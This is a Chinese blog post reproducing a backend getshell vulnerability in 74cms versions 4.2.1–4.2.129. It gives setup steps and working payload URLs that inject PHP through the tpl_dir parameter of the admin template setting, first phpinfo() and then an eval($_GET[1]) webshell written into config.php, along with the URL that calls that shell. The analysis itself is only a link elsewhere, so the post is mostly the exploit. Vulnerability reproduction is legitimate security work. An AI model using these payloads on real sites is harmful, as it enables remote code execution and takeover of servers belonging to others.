74cms v4.2.1-v4.2.129-后台getshell漏洞复现

qianxiao996 2019-12-09 PM 43℃ 0条

0x00 影响范围

v4.2.1-v4.2.129

0x01 环境搭建

1. 先去官网下载 骑士人才系统基础版(安装包)

2.将下载好的包进行安装

1.png

0x02 复现过程

当前版本v4.2.1112.png


点加工具,点击风格模板3.png

Payload:
http://127.0.0.1/74cms/index.php?m=admin&c=tpl&a=set&tpl_dir=','a',phpinfo(),'

shell地址:
http://127.0.0.1/74cms/Application/Home/Conf/config.php

直接访问

5.png

后端代码

GETSHELL

http://127.0.0.1/74cms/index.php?m=admin&c=tpl&a=set&tpl_dir=','a',eval($_GET[1]),'

后端代码

http://127.0.0.1/74cms/Application/Home/Conf/config.php?1=phpinfo();

0x03 漏洞分析

请移步http://www.xinziyou123.com/%e6%96%b0%e7%89%8874cms-v4-2-1-v4-2-129-%e5%90%8e%e5%8f%b0getshell%e6%bc%8f%e6%b4%9e/


标签: 74cms

非特殊说明,本博所有文章均为博主原创。

评论啦~


icon_mrgreen.pngicon_neutral.pngicon_twisted.pngicon_arrow.pngicon_eek.pngicon_smile.pngicon_confused.pngicon_cool.pngicon_evil.pngicon_biggrin.pngicon_idea.pngicon_redface.pngicon_razz.pngicon_rolleyes.pngicon_wink.pngicon_cry.pngicon_surprised.pngicon_lol.pngicon_mad.pngicon_sad.pngicon_exclaim.pngicon_question.png